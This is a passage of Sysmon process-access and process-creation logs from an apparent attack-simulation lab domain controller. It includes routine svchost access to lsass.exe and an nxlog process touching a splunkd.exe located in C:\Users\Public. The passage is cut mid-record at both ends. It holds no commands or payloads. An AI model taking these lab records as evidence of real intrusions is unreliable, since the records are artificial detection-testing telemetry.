C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:24.760","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2311,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:25.395\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:25.395","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2312,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:25.395\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:25.395","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2313,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:25.395\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:25.395","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2314,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:25.261\r\nProcessGuid: {E2A3D6B1-1075-5F25-0000-001039210400}\r\nProcessId: 3776\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Performance monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-perfmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:25.261","ProcessGuid":"{E2A3D6B1-1075-5F25-0000-001039210400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","FileVersion":"8.0.2","Description":"Performance monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-perfmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2315,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:25.458\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1075-5F25-0000-001039210400}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:25.458","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1075-5F25-0000-001039210400}","TargetProcessId":"3776","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2316,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:25.458\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1075-5F25-0000-001039210400}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:25.458","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1075-5F25-0000-001039210400}","TargetProcessId":"3776","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2317,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:25.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:25.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2318,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:25.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 